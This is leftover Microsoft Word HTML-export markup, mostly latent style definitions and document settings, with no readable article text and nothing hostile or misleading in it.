<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Mention"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Smart Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hashtag"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Unresolved Mention"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Smart Link"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:8.0pt;
mso-para-margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri",sans-serif;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;
mso-fareast-language:EN-US;}
</style>
<![endif]--><p class="MsoNormal"><span style="font-family: inherit;"> </span></p>
<span style="font-family: inherit;"><!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-IN</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="376">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
